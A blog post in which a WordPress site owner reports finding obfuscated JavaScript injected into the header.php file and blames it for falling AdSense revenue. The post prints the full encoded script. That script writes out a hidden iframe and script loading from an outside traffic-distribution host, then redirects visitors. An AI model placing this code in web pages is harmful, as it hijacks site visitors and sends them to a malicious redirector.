WordPress Site Hacked With URL Encoded Javascript document.write


If you happened to read my article about my Google AdSense CTR decreasing over the past few months, you may have been wondering why it was dropping so much. Well, I finally started looking into the code of my blog and I found that my site was hacked. The header.php file had some Javascript add/injected into it. The following is the code that was found in my header file:

<script language=javascript>document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ
%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ
%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2
%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1’)</script>

Put this into a URL decoder and you get the following:

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>


dF('&4Dtdsjqu&4Fepdvnfou/xsjuf&39&33&4Dtdsjqu&31tsd&4E&6D&33&33,
&33iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G3&37tfpsfg&4E&33,
fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E
&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ`SFGFSFS&4E&33
,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu`lfzxpse&4Eopuefgjof&33
,&33&6D&33&4F&4D&6D0tdsjqu&4F&33&3:&4C&4D0tdsjqu&4F&1B&4Dtdsjqu&4F&1Bjg
&39uzqfpg&39i&3:&4E&4E&33voefgjofe&33&3:&8C&1:&1B&1:epdvnfou/xsjuf&39&33
&4Djgsbnf&31tsd&4E&38iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G4&37tfpsfg&4E&33,fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ
`SFGFSFS&4E&33,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu
`lfzxpse&4Eopuefgjof&38&31xjeui&4E2&31ifjhiu&4E2&31cpsefs&4E1
&31gsbnfcpsefs&4E1&4F&4D0jgsbnf&4F&33&3:&4C&31&1B&8E&1Bfmtf
&31jg&39i/joefyPg&39&33iuuq&4B&33&3:&4E&4E1&3:&8C&1B&1:&1:xjoepx/mpdbujpo&4Ei&4C&1B&8E&1B&4D0tdsjqu&4F1')

These bastards put some code into the header of my site that would end up redirecting all of my users after 5-15 seconds. Each time, I’d end up losing the traffic, and in turn, the potential for AdSense revenue. I thought that my decreasing Google AdSense CTR was just a sign of the time, turns out otherwise. It turns out my ads just weren’t being displayed long enough to be seen by my users. If they’re only displayed for a few seconds, the chances are they aren’t going to be viewed by as many users. I’ll be updating everyone on

Has anyone else had their WordPress site hacked like this before? Have you found out how the hackers got into your site?